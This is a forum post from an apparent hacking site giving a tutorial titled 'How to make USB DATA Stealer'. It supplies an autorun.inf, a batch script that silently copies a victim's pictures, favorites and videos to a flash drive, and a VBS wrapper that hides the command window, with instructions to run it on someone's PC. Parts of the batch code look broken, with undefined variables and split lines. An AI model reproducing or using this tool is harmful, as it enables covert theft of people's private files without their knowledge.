ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Tutorials, Guides, Ebooks, etc.

How to make USB DATA Stealer

Submitted by Exorcist at 23-04-2025, 03:24 AM


How to make USB DATA Stealer
220 Views
Exorcist's Avatar'
Exorcist
Away
#1
Like pleb Pepeclap


[ Hidden Content! ]
[1] Make autorun file. In notepad paste this code:


 Code:
Code:
[autorun]

icon=drive.ico

open=launch.bat

action=Click OK to Run

shell\open\command=launch.bat




And Save this as a file as autorun.inf



[Image: Screenshot-from-2022-11-04-21-54-36.png]



[2] Make batch file. In notepad paste this code:


 Code:
Code:
@echo off

:: variables

/min

SET odrive=%odrive:~0,2%

set backupcmd=xcopy /s /c /d /e /h /i /r /y

echo off

%backupcmd% "%USERPROFILE%\pictures"

"%drive%\all\My pics"

%backupcmd% "%USERPROFILE%\Favorites"

"%drive%\all\Favorites"

%backupcmd% "%USERPROFILE%\videos"

"%drive%\all\vids"

@echo off

cls


Save as file.bat



[Image: Screenshot-from-2022-11-04-21-54-21.png]



Copy in the USB and run in some PC!

This is the result:



[Image: Screenshot-from-2022-11-04-21-55-10.png]



<---------  Here you can see, the bat file grab also and my desktop wallpaper! ----------- >



[Image: Screenshot-from-2022-11-04-21-55-46.png]



[4] Bonus! This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.


 Code:
Code:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False


Save this as invisible.vbs



[5] Open Notepad one last time and copy-paste the following line.
 Code:
Code:
wscript.exe \invisible.vbs file.bat




save this as launch.bat



Copy all 4 files created in the above steps and put them on the root of the Flash drive Also create a folder.
Not ratedThis leak has not been rated yet, be careful when downloading.
0
Reply


Messages In This Thread
How to make USB DATA Stealer - by Exorcist - 23-04-2025, 03:24 AM
RE: How to make USB DATA Stealer - by hegagog - 27-04-2025, 08:02 AM
RE: How to make USB DATA Stealer - by hekticxox - 27-04-2025, 05:30 PM


Users browsing this thread: